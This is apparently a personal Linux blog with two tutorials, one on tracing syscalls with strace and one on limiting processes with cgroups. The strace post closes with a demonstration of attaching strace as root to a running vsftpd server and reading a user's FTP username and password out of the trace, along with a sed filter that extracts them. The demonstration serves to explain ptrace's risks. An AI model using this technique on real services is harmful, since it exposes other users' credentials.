Ningún detalle es anecdótico...: bash


Friday, August 19, 2016

Strace 101 - stracing your stuff!

It's been a while since the last blog post, like 4 months went by! I remember I once thought I could write one post per week xD, that did not work at all hahaha. Anyway..., over the last few days I had the chance to spend some time working with strace and perf, so I decided to write something about it here as well.

Strace? What the heck is it?

Strace is a nice debugging/troubleshooting tool for Linux that helps you identify the syscalls a particular process is using and the signals a process receives (more details in the strace man page linked at the end of this post). Syscalls are basically the interface to access kernel services. Therefore, knowing which syscalls a program is issuing and what the results of these calls are is really useful when debugging software problems.

But how is it possible that a User space process is able to see the syscalls another User space process issues? Well, there's a kernel feature called ptrace that makes that possible (yeah... ptrace is a system call xD). By definition ptrace is:

The ptrace() system call provides a means by which one process (the "tracer") may observe and control the execution of another process (the "tracee"), and examine and change the tracee's memory and registers. It is primarily used to implement breakpoint debugging and system call tracing.

There are basically 2 ways you can strace a process to see its syscalls: you can either launch the process using strace or attach strace to a running process (under certain conditions :D).

How does it work? Show me the money!

I strongly believe the best way to explain something is by showing working examples, so here we go... Let's see how many syscalls (and which ones) the classic "Hello World" issues. The C code is:

#include <stdio.h>
int main()
{
     printf("Hello World\n");
     return 0;
}

Compile and run:

juan@juan-VirtualBox:~$ gcc -o classic classic.c 
juan@juan-VirtualBox:~$ ./classic 
Hello World
juan@juan-VirtualBox:~$

now we run it using strace instead:

juan@juan-VirtualBox:~$ strace ./classic
execve("./classic", ["./classic"], [/* 60 vars */]) = 0
brk(0)  = 0x7f0000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362d17000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=85679, ...}) = 0
mmap(NULL, 85679, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f0362d02000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P \2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1840928, ...}) = 0
mmap(NULL, 3949248, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f0362732000
mprotect(0x7f03628ec000, 2097152, PROT_NONE) = 0
mmap(0x7f0362aec000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ba000) = 0x7f0362aec000
mmap(0x7f0362af2000, 17088, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f0362af2000
close(3) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362d01000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362cff000
arch_prctl(ARCH_SET_FS, 0x7f0362cff740) = 0
mprotect(0x7f0362aec000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f0362d19000, 4096, PROT_READ) = 0
munmap(0x7f0362d02000, 85679) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0 
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f0362d16000
write(1, "Hello World\n", 12Hello World
) = 12
exit_group(0) = ?
+++ exited with 0 +++
juan@juan-VirtualBox:~$

The output shows one system call per line, and each line includes the syscall name, the parameters used to invoke it and the result returned (after the =). As we can see, even the simplest piece of code you can imagine makes use of many syscalls. I will only comment on a few of them (maybe in a future post we can dive deeper :D):

execve (the first one): just before this call strace forked itself and the child process called the ptrace syscall, allowing the strace parent to trace it. After all that, the child runs execve, replacing its running code with our classic C program.
brk changes the location of the program break, which defines the end of the process's data segment. Increasing the break allocates memory to the process, while decreasing it deallocates memory. In this case it is called with 0 as the requested address, which can never be satisfied, so the Linux syscall simply returns the current program break (0x7f0000).
we see several mmap syscalls, some mapping anonymous memory regions and others mapping the libc.so.6 library. This is the dynamic linker doing its job and adding all the necessary libraries to the process memory space.
there are also a couple of open syscalls, opening files like /etc/ld.so.cache, where the dynamic linker can find a list of the available system libraries.
just before finishing we see a write syscall, sending our classic "Hello World" to file descriptor 1, also known as STDOUT (standard output). Since strace (on standard error) and classic (on standard output) are both writing to the same console, we can see how their outputs collided in lines 29 and 30.
the last call was exit_group, which is equivalent to the exit syscall except that it terminates not only the calling thread but all the threads in the thread group (this particular example was single threaded).

This should provide a fair idea of what a particular piece of software does and which kernel services it's accessing. However, sometimes we don't want to go into so much detail and would rather see a summary. We can easily get that with the -c flag:

juan@juan-VirtualBox:~$ strace -c ./classic 
Hello World
% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
  0.00    0.000000           0         1           read
  0.00    0.000000           0         1           write
  0.00    0.000000           0         2           open
  0.00    0.000000           0         2           close
  0.00    0.000000           0         3           fstat
  0.00    0.000000           0         8           mmap
  0.00    0.000000           0         4           mprotect
  0.00    0.000000           0         1           munmap
  0.00    0.000000           0         1           brk
  0.00    0.000000           0         3         3 access
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         1           arch_prctl
------ ----------- ----------- --------- --------- ----------------
100.00    0.000000                    28         3 total
juan@juan-VirtualBox:~$

The output shows the list of syscalls issued by the process (and its threads if there were more than 1), the number of times each one was called, the number of times they failed, and the CPU time they consumed (kernel space time, aka system time). With this output we can easily see that 3 syscalls failed, and if we go back to the full strace output we'll see that lines 4, 6 and 11 returned ENOENT "No such file or directory".
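If all you have is a saved full trace, a rough version of this summary can be rebuilt with awk. This is only a sketch: summarize_strace is a made-up helper name, it assumes the plain one-call-per-line format shown above (no -f PID prefixes, no timestamps), and it does not try to compute any timing.

```shell
# Tally calls and failures per syscall from a plain strace log on stdin.
# Prints "<calls> <errors> <syscall>" per line, sorted by syscall name.
summarize_strace() {
    awk '
        # A syscall line starts with the syscall name followed by "(".
        match($0, /^[a-z_0-9]+\(/) {
            name = substr($0, 1, RLENGTH - 1)
            calls[name]++
            # Failed calls end in "= -1 ERRNO (description)".
            if ($0 ~ /= -1 E[A-Z]+/) errors[name]++
        }
        END {
            for (n in calls) printf "%d %d %s\n", calls[n], errors[n] + 0, n
        }
    ' | sort -k3
}

# Usage (file name is hypothetical):
#   strace ./classic 2> classic.trace
#   summarize_strace < classic.trace
```

Fed with the Hello World trace above, it should report access with 3 calls and 3 errors, in line with the -c table.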

I mentioned before that it is also possible to strace an already running process, so let's take a look at that. First we have to identify a target process, in this case nc with PID 8739:

juan@juan-VirtualBox:~$ ps aux|grep -i nc
root       954  0.0  0.0  19196  2144 ?        Ss   01:33   0:04 /usr/sbin/irqbalance
juan      2055  0.0  0.2 355028  8396 ?        Ssl  01:33   0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher --launch-immediately
juan      8739  0.0  0.0   9132   800 pts/0    S    11:52   0:00 nc -l 9999
juan      2585  0.0  0.0  24440  1964 ?        S    01:33   0:00 dbus-launch --autolaunch 0c0058daf07f369dd9b0d1605654eff1 --binary-syntax --close-stderr
juan      9477  0.0  0.0  15948  2304 pts/2    R+   14:03   0:00 grep --color=auto -i nc
juan@juan-VirtualBox:~$

now let's try to attach strace to it in order to inspect the syscalls:

juan@juan-VirtualBox:~$ strace -p 8739
strace: attach: ptrace(PTRACE_ATTACH, ...): Operation not permitted
Could not attach to process. If your uid matches the uid of the target
process, check the setting of /proc/sys/kernel/yama/ptrace_scope, or try
again as the root user. For more details, see /etc/sysctl.d/10-ptrace.conf
juan@juan-VirtualBox:~$

interesting :D. Turns out that by default Ubuntu doesn't let unprivileged users use PTRACE_ATTACH on arbitrary processes. Why? We'll see an example later :P. Ptrace has different scopes (4 actually, 0 to 3, 3 being the most restrictive one):

A PTRACE scope of "0" is the more permissive mode. A scope of "1" limits PTRACE only to direct child processes (e.g. "gdb name-of-program" and "strace -f name-of-program" work, but gdb's "attach" and "strace -fp $PID" do not). The PTRACE scope is ignored when a user has CAP_SYS_PTRACE, so "sudo strace -fp $PID" will work as before.

if we take a look at the current ptrace_scope value we'll see we have scope 1:

juan@juan-VirtualBox:~$ cat /proc/sys/kernel/yama/ptrace_scope
1
juan@juan-VirtualBox:~$
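To keep the four values straight, here is a tiny lookup helper. It is a sketch: describe_ptrace_scope is a hypothetical name and the descriptions are my own paraphrase of the Yama documentation linked at the end of this post, not text produced by any tool.

```shell
# Map a Yama ptrace_scope value (0-3) to a short description.
describe_ptrace_scope() {
    case "$1" in
        0) echo "classic: a process may attach to any other process running under the same uid" ;;
        1) echo "restricted: only descendants (or processes that opted in) can be attached" ;;
        2) echo "admin-only: attaching requires CAP_SYS_PTRACE" ;;
        3) echo "no attach: ptrace attach is disabled and the value cannot be changed back" ;;
        *) echo "unknown scope: $1"; return 1 ;;
    esac
}

# Usage:
#   describe_ptrace_scope "$(cat /proc/sys/kernel/yama/ptrace_scope)"
```

On the VM above, where the file contains 1, this would print the "restricted" line.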

At this point we have two options: we either try with sudo or we enable scope 0 system wide by changing /proc/sys/kernel/yama/ptrace_scope (this might be dangerous). Let's go with sudo now:

juan@juan-VirtualBox:~$ sudo strace -p 8739
Process 8739 attached
accept(3, {sa_family=AF_INET, sin_port=htons(34404), sin_addr=inet_addr("127.0.0.1")}, [16]) = 4
close(3) = 0
poll([{fd=4, events=POLLIN}, {fd=0, events=POLLIN}], 2, 4294967295) = 1 ([{fd=4, revents=POLLIN}])
read(4, "Hello World through NC\n", 2048) = 23
write(1, "Hello World through NC\n", 23) = 23
poll([{fd=4, events=POLLIN}, {fd=0, events=POLLIN}], 2, 4294967295) = 1 ([{fd=4, revents=POLLIN}])
read(4, "", 2048) = 0
shutdown(4, SHUT_RD) = 0
close(4) = 0
close(3) = -1 EBADF (Bad file descriptor)
close(3) = -1 EBADF (Bad file descriptor)
exit_group(0) = ?
+++ exited with 0 +++
juan@juan-VirtualBox:~$

It worked indeed! Let's do a brief review of the syscalls:

First an accept call. It extracts the first connection request on the queue of pending connections for the listening socket (fd 3), creates a new connected socket, and returns a new file descriptor referring to that socket (fd 4). The newly created socket is not in the listening state. The original socket 3 is unaffected by this call.
Then a close call closes the listening socket 3.
The next call was poll, which waits for one of a set of file descriptors to become ready to perform I/O. In this case we can see it waits for fd 4 (the socket just created for the incoming connection) and fd 0 (the standard input).
Right after the poll we see the read call, reading 23 bytes out of fd 4 using a 2048-byte buffer.
After finishing reading, nc uses write to send the received bytes to fd 1, the standard output.
Then nc polls again for any extra data coming in. This time poll reports fd 4 as readable, but the following read returns 0, which means end of file: the connection was closed on the other side.
The shutdown call shuts down all or part of a full-duplex connection on a given socket, in this case the one referred to by fd 4.
Then we have 3 close calls: the first one closes the file descriptor of the socket created by the accept call, while the next two try to close a fd that had already been closed on line 4 (fd 3), which is kind of weird and could be a bug.

Why could ptrace be dangerous?

Debugging tools are usually double-edged swords, right? Well, ptrace is no exception to that rule. Having access to the interface between user space and kernel space of a process can leak important information, like credentials.

Let's see an extremely simple example. My virtual machine has vsftpd 3.0.2 running, so let's capture the credentials of a system user that logs into the FTP service. In this case I will set a few extra flags on strace in order to make things easier:

-f traces child processes as they are created by currently traced processes as a result of the fork system call.
-e trace=read,write is a filter that tells strace to record only read and write syscalls.
-o sets an output file where the syscalls will be recorded.

So let's strace:

juan@juan-VirtualBox:~$ sudo strace -f -e trace=read,write -o output -p $(pidof vsftpd)
Process 10040 attached
Process 10280 attached
Process 10281 attached
Process 10282 attached
^CProcess 10040 detached
juan@juan-VirtualBox:~$

we can see vsftpd forked a few times while we connected to it using the ftp client. Now let's take a look at the content of the output file:

juan@juan-VirtualBox:~$ cat output 
10280 read(3, "TZif2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n\0\0\0\n\0\0\0\0"..., 4096) = 3533
10280 read(3, "TZif2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\v\0\0\0\v\0\0\0\0"..., 4096) = 2248
10280 read(4,  
10281 read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 507
10281 read(4, "", 4096)                 = 0
10281 read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\23\0\0\0\0\0\0"..., 832) = 832
10281 read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240!\0\0\0\0\0\0"..., 832) = 832
10281 read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\"\0\0\0\0\0\0"..., 832) = 832
10281 write(3, "Sat Aug 20 17:06:02 2016 [pid 10"..., 65) = 65
10281 write(0, "220 (vsFTPd 3.0.2)\r\n", 20) = 20
10281 read(0, "USER juan\r\n", 11)      = 11
10281 write(0, "331 Please specify the password."..., 34) = 34
10281 read(0, "PASS MyPassw0rd\r\n", 17)  = 17
10281 write(5, "\1", 1)                 = 1
10280 <... read resumed> "\1", 1)       = 1
10281 write(5, "\4\0\0\0", 4 
10280 read(4,  
10281 <... write resumed> )             = 4
10280 <... read resumed> "\4\0\0\0", 4) = 4
10281 write(5, "juan", 4 
10280 read(4,  
...
10282 write(0, "230 Login successful.\r\n", 23) = 23
10282 read(0, "SYST\r\n", 6)            = 6
10282 write(0, "215 UNIX Type: L8\r\n", 19) = 19
10282 read(0, "QUIT\r\n", 6)            = 6
10282 write(0, "221 Goodbye.\r\n", 14)  = 14
10282 +++ exited with 0 +++
10280 <... read resumed> 0x7ffe4994960f, 1) = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
10280 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=10282, si_status=0, si_utime=0, si_stime=0} ---
10280 +++ killed by SIGSYS +++
10040 --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_KILLED, si_pid=10280, si_status=SIGSYS, si_utime=0, si_stime=1} ---
juan@juan-VirtualBox:~$

As we anticipated, we can see both username and password on lines 12 and 14. Ok, yes, this is FTP and we could also have captured the credentials with a simple network capture, but this is just an example :D of how strace (ptrace actually) can be used to leak sensitive information.
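To show how little effort it takes to pull the interesting lines out of such a log, here is a small sed filter. Take it as a sketch: reads_on_fd is a name I made up, it assumes the "PID syscall(...) = result" layout that -f -o produces above, and it ignores calls that were split into "unfinished"/"resumed" pairs.

```shell
# Print "<pid> <payload>" for every completed read() on the given fd
# found in a `strace -f -o FILE` log supplied on stdin.
reads_on_fd() {
    local fd="$1"
    # Group 1 = PID, group 2 = the quoted buffer contents as strace printed them.
    sed -n -E "s/^([0-9]+) +read\(${fd}, \"(.*)\"(\.\.\.)?, [0-9]+\) += [0-9]+\$/\1 \2/p"
}

# Usage, with the log captured above (fd 0 is the FTP control connection here):
#   reads_on_fd 0 < output
```

On the log above this would leave only the FTP commands sent by the client (USER, PASS, SYST, QUIT), which is exactly why letting people ptrace arbitrary processes is risky.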

I hope this was interesting, at least it was for me xD. Here I list some interesting links I found on the way:

http://linux.die.net/man/1/strace
http://linux.die.net/man/2/ptrace
http://man7.org/linux/man-pages/man2/syscalls.2.html
https://www.kernel.org/doc/Documentation/security/Yama.txt

Monday, April 4, 2016

cgroups 101 - keep your processes under control!

A few days ago, reading a bit about systemd and all the beauty of it, I came across Control Groups, aka cgroups. I had read about them before, however I never had the chance to play around with them hands-on.

Cgroups are a kernel feature that allows sysadmins and human beings (:P) to group processes/tasks in order to assign system resources like CPU, memory, IO, etc. in a more fine-grained way. Cgroups can be arranged in a hierarchical manner, and every process in the system belongs to exactly one cgroup per hierarchy at any single point in time. In conjunction with Linux namespaces (next post :D), cgroups are a cornerstone for things like Docker containers.

So how do cgroups provide access/accounting control over CPU, memory, etc.?

There's another concept involved in cgroups, and it is subsystems. A subsystem is the resource scheduler/controller in charge of setting the limits for a particular resource. Some of the most common subsystems are:

cpuset: this subsystem makes it possible to assign a group of tasks to particular CPUs and memory nodes, which is particularly interesting on NUMA systems.
memory: this subsystem, as you have probably guessed, allows you to control the amount of memory a group of tasks can use.
freezer: this subsystem allows you to easily freeze a group of processes, and unfreeze them later on so they can continue running.
blkio: yes, that's correct, this subsystem allows you to define IO limits for processes. Its proportional weight policy only works when using the CFQ IO scheduler, while the throttling policy used later in this post is implemented in the generic block layer.

You can get a full list of the supported subsystems on your system from /proc/cgroups file:

root@ubuntu-server:/etc# cat /proc/cgroups
#subsys_name    hierarchy       num_cgroups     enabled
cpuset          0               1               1
cpu             0               1               1
cpuacct         0               1               1
memory          0               1               1
devices         0               1               1
freezer         0               1               1
net_cls         0               1               1
blkio           0               1               1
perf_event      0               1               1
net_prio        0               1               1
hugetlb         0               1               1
root@ubuntu-server:/etc#

this is what it looks like on an Ubuntu 14.04.4 VM.
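If you only care about the names of the subsystems that are switched on, the table is easy to filter. A minimal sketch, assuming the four-column layout shown above (enabled_subsystems is just a name I picked):

```shell
# List the subsystems whose "enabled" column (4th field) is 1.
# Expects the contents of /proc/cgroups on stdin; the "#" header line is skipped.
enabled_subsystems() {
    awk '!/^#/ && $4 == 1 { print $1 }'
}

# Usage:
#   enabled_subsystems < /proc/cgroups
```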

Ok, so far so good, but how can we access these so called cgroups and subsystems?

Fortunately the cgroups interface is accessible through its Virtual File System representation (there are also a couple of fancy tools available on RHEL systems). We can see, for example, the default cgroups setup that comes with Ubuntu 14.04.4:

root@ubuntu-server:/etc# mount |grep cgroup
none on /sys/fs/cgroup type tmpfs (rw)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
root@ubuntu-server:/etc#

Note: there's a systemd "device" mounted on /sys/fs/cgroup/systemd and the File System type is cgroup. No subsystems are included in this cgroup hierarchy.

but in order to start from scratch I'll build a new cgroup hierarchy ignoring the one that comes by default.

I created a new directory under the same tmpfs:

root@ubuntu-server:/etc# mkdir /sys/fs/cgroup/MyHierarchy
root@ubuntu-server:/etc# ls /sys/fs/cgroup/
MyHierarchy systemd
root@ubuntu-server:/etc#

then mounted a cgroup hierarchy on the new directory:

root@ubuntu-server:/etc# mount -t cgroup MyHierarchy -o none,name=MyHierarchy /sys/fs/cgroup/MyHierarchy/
root@ubuntu-server:/etc# mount |grep cgroup
none on /sys/fs/cgroup type tmpfs (rw)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
MyHierarchy on /sys/fs/cgroup/MyHierarchy type cgroup (rw,none,name=MyHierarchy)
root@ubuntu-server:/etc#

Note: -o none will cause the mount not to include any subsystem on the hierarchy.

So, is that it? Well..., no xD, we've done nothing so far but create a cgroup hierarchy. Let's take a look at the files under it:

root@ubuntu-server:/etc# ls /sys/fs/cgroup/MyHierarchy/
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks
root@ubuntu-server:/etc#

these are the basic files for a cgroup. They describe, for example, which processes belong to it (tasks and cgroup.procs) and what command should be executed after the last task leaves the cgroup (notify_on_release, release_agent). The most interesting file is tasks, which keeps the list of the processes that belong to the cgroup. Remember that by default all the processes will be listed there since this is a root cgroup:

root@ubuntu-server:/etc# head /sys/fs/cgroup/MyHierarchy/tasks
1
2
3
5
7
8
9
10
11
12
root@ubuntu-server:/etc# wc -l /sys/fs/cgroup/MyHierarchy/tasks
132 /sys/fs/cgroup/MyHierarchy/tasks
root@ubuntu-server:/etc#

Note: Process IDs can show up more than once and not in order, however a particular process will belong to a single cgroup within the same hierarchy.

We can easily create a sub cgroup (child cgroup) by creating a folder under the root one:

root@ubuntu-server:/etc# mkdir /sys/fs/cgroup/MyHierarchy/SubCgroup1
root@ubuntu-server:/etc# ls /sys/fs/cgroup/MyHierarchy/SubCgroup1/
cgroup.clone_children cgroup.procs notify_on_release tasks
root@ubuntu-server:/etc#

this new cgroup has again similar files but no tasks are associated to it by default:

root@ubuntu-server:/etc# cat /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
root@ubuntu-server:/etc#

We can easily move a task to this new cgroup by just writing the task PID into the tasks file:

root@ubuntu-server:/etc# echo $$
4826
root@ubuntu-server:/etc# ps aux|grep 4826
root 4826 0.0 0.7 21332 3952 pts/0 S Apr02 0:00 bash
root 17971 0.0 0.4 11748 2220 pts/0 S+ 04:30 0:00 grep --color=auto 4826
root@ubuntu-server:/etc# echo $$ > /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
root@ubuntu-server:/etc# cat /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
4826
17979
root@ubuntu-server:/etc#

in the previous example I moved root's bash process to SubCgroup1, and you can see the PID inside the tasks file. But there's another PID there as well, why? That PID belongs to the cat command: any forked process is assigned to the same cgroup its parent belongs to. We can also confirm PID 4826 doesn't belong to the root cgroup anymore:

root@ubuntu-server:/etc# grep 4826 /sys/fs/cgroup/MyHierarchy/tasks
root@ubuntu-server:/etc#

What if we want to know which cgroup a particular process belongs to?

We can easily find that out from our lovely /proc:

root@ubuntu-server:/etc# cat /proc/4826/cgroup
3:name=MyHierarchy:/SubCgroup1
1:name=systemd:/user/1000.user/1.session
root@ubuntu-server:/etc#

Note: see how our shell belongs to two different cgroups, this is possible because they belong to different hierarchies.
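Each line in that file has the form id:controllers:path, so picking the cgroup for one particular hierarchy is a short loop. A sketch under that assumption (cgroup_path_for is a hypothetical helper, not a standard command):

```shell
# Print the cgroup path for the hierarchy that carries the given controller
# or name (e.g. "memory" or "name=MyHierarchy").
# Expects the contents of /proc/<pid>/cgroup on stdin.
cgroup_path_for() {
    local want="$1" _id controllers path
    while IFS=: read -r _id controllers path; do
        # The middle field is a comma-separated list; wrap it in commas
        # so that only whole entries match.
        case ",$controllers," in
            *",$want,"*) printf '%s\n' "$path" ;;
        esac
    done
}

# Usage:
#   cgroup_path_for name=MyHierarchy < /proc/4826/cgroup
```

With the output shown above, that call would print /SubCgroup1.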

Ok, but by themselves cgroups just segregate tasks in groups, however they become interestingly powerful when mixed with the subsystems.

Testing a few Subsystems:

I rolled back the hierarchy I mounted before using umount as with any other File System, so we are back to square one:

root@ubuntu-server:/etc# umount /sys/fs/cgroup/MyHierarchy/
root@ubuntu-server:/etc# mount |grep cgroup
none on /sys/fs/cgroup type tmpfs (rw)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
root@ubuntu-server:/etc#

I mounted the hierarchy again, but this time enabling cpu, memory and blkio subsystems, like this:

root@ubuntu-server:/etc# mount -t cgroup MyHierarchy -o cpu,memory,blkio,name=MyHierarchy /sys/fs/cgroup/MyHierarchy
mount: MyHierarchy already mounted or /sys/fs/cgroup/MyHierarchy busy
root@ubuntu-server:/etc#

WTF??? according to the error the mount point is busy or still mounted... well it turns out that

When a cgroup filesystem is unmounted, if there are any child cgroups created below the top-level cgroup, that hierarchy will remain active even though unmounted; if there are no child cgroups then the hierarchy will be deactivated.

so, I have to either move process 4826 and its children back to the root cgroup or kill 'em all!!! Of course killing them was the easy way out. With that done, voilà:

root@ubuntu-server:/home/juan# mount -v -t cgroup MyHierarchy -o cpu,memory,blkio,name=MyHierarchy /sys/fs/cgroup/MyHierarchy
MyHierarchy on /sys/fs/cgroup/MyHierarchy type cgroup (rw,cpu,memory,blkio,name=MyHierarchy)
root@ubuntu-server:/home/juan#

now the hierarchy includes 3 subsystems: cpu, memory and blkio. Let's see what it looks like now:

root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/
blkio.io_merged                   blkio.sectors_recursive           cpu.cfs_quota_us                    memory.move_charge_at_immigrate
blkio.io_merged_recursive         blkio.throttle.io_service_bytes   cpu.shares                          memory.numa_stat
blkio.io_queued                   blkio.throttle.io_serviced        cpu.stat                            memory.oom_control
blkio.io_queued_recursive         blkio.throttle.read_bps_device    memory.failcnt                      memory.pressure_level
blkio.io_service_bytes            blkio.throttle.read_iops_device   memory.force_empty                  memory.soft_limit_in_bytes
blkio.io_service_bytes_recursive blkio.throttle.write_bps_device   memory.kmem.failcnt                 memory.stat
blkio.io_serviced                 blkio.throttle.write_iops_device memory.kmem.limit_in_bytes          memory.swappiness
blkio.io_serviced_recursive       blkio.time                        memory.kmem.max_usage_in_bytes      memory.usage_in_bytes
blkio.io_service_time             blkio.time_recursive              memory.kmem.slabinfo                memory.use_hierarchy
blkio.io_service_time_recursive   blkio.weight                      memory.kmem.tcp.failcnt             notify_on_release
blkio.io_wait_time                blkio.weight_device               memory.kmem.tcp.limit_in_bytes      release_agent
blkio.io_wait_time_recursive      cgroup.clone_children             memory.kmem.tcp.max_usage_in_bytes SubCgroup1
blkio.leaf_weight                 cgroup.event_control              memory.kmem.tcp.usage_in_bytes      tasks
blkio.leaf_weight_device          cgroup.procs                      memory.kmem.usage_in_bytes
blkio.reset_stats                 cgroup.sane_behavior              memory.limit_in_bytes
blkio.sectors                     cpu.cfs_period_us                 memory.max_usage_in_bytes
root@ubuntu-server:/home/juan#

yeah... many files, right? We should find a few files per active subsystem:

root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/|grep -c "cpu\."
4
root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/|grep -c "memory\."
22
root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/|grep -c "blkio\."
27
root@ubuntu-server:/home/juan#

These files are the ones we can tune, and of course I'm not going to explain all of them (not that I know them all, to be honest xD). Something interesting is that some parameters can't be applied to the root cgroup, for quite obvious reasons: remember that by default all the processes belong to the root cgroup in the hierarchy, and you certainly don't want to throttle some critical system processes.

So for testing purposes I'll set up a second child cgroup called SubCgroup2 and set two different throttle limits on write operations to the root volume /dev/sda. First things first, I need to identify the major and minor numbers of the device:

root@ubuntu-server:/home/juan# lsblk
NAME   MAJ:MIN RM   SIZE RO TYPE MOUNTPOINT
sda      8:0    0     5G 0 disk
├─sda1   8:1    0   4.5G 0 part /
├─sda2   8:2    0     1K 0 part
└─sda5   8:5    0   510M 0 part
sr0     11:0    1 1024M 0 rom
root@ubuntu-server:/home/juan#

Ok, 8 and 0 should do the trick here. Now we set the throttle using the file called blkio.throttle.write_bps_device, like this:

root@ubuntu-server:/home/juan# echo "8:0 10240000" > /sys/fs/cgroup/MyHierarchy/SubCgroup1/blkio.throttle.write_bps_device
root@ubuntu-server:/home/juan# echo "8:0 20480000" > /sys/fs/cgroup/MyHierarchy/SubCgroup2/blkio.throttle.write_bps_device
root@ubuntu-server:/home/juan#

see that I've throttled the processes under SubCgroup1 to 10240000 bytes per second and the processes under SubCgroup2 to 20480000 bytes per second. In order to test this I've opened two new shells:

root@ubuntu-server:/home/juan# ps aux|grep bash
juan      1440 0.0 1.0 22456 5152 pts/0    Ss   22:28   0:00 -bash
root      2389 0.0 0.7 21244 3984 pts/0    S    22:35   0:00 bash
juan      6897 0.0 0.9 22456 4996 pts/2    Ss+ 23:49   0:00 -bash
juan      6961 0.1 1.0 22456 5076 pts/3    Ss+ 23:49   0:00 -bash
root      7276 0.0 0.4 11748 2132 pts/0    S+   23:50   0:00 grep --color=auto bash
root@ubuntu-server:/home/juan#

and pushed their PIDs to the cgroups:

root@ubuntu-server:/home/juan# echo 6897 > /sys/fs/cgroup/MyHierarchy/SubCgroup1/tasks
root@ubuntu-server:/home/juan# echo 6961 > /sys/fs/cgroup/MyHierarchy/SubCgroup2/tasks
root@ubuntu-server:/home/juan#

now let's see what happens when doing some intensive writes to the drive:

Shell under SubCgroup1:

juan@ubuntu-server:~$ echo $$
6897
juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 52.6549 s, 10.2 MB/s
juan@ubuntu-server:~$

Shell under SubCgroup2:

juan@ubuntu-server:~$ echo $$
6961
juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 26.3397 s, 20.4 MB/s
juan@ubuntu-server:~$

Shell under the root cgroup (no throttling here :D):

juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 3.98033 s, 135 MB/s
juan@ubuntu-server:~$

Cool, isn't it? The throttle worked fine: dd under shell 6897 was throttled at about 10 MB/s while the one under shell 6961 was throttled at about 20 MB/s. But what if two processes under the same cgroup try to write at the same time, how does the throttle work?

juan@ubuntu-server:~$ echo $$
6897
juan@ubuntu-server:~$ dd oflag=dsync if=/dev/zero of=test bs=1M count=512 & dd oflag=dsync if=/dev/zero of=test1 bs=1M count=512 &
[1] 8265
[2] 8266
juan@ubuntu-server:~$ 512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 105.142 s, 5.1 MB/s
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied, 105.24 s, 5.1 MB/s

[1]- Done                    dd oflag=dsync if=/dev/zero of=test bs=1M count=512
[2]+ Done                    dd oflag=dsync if=/dev/zero of=test1 bs=1M count=512
juan@ubuntu-server:~$

the throughput limit is shared among the processes under the same cgroup, which makes perfect sense considering the limit is applied to the group as a whole. There are tons of different parameters to play with the blkio subsystem like weights, sectors, service time, etc. So be brave and have fun with them :P.
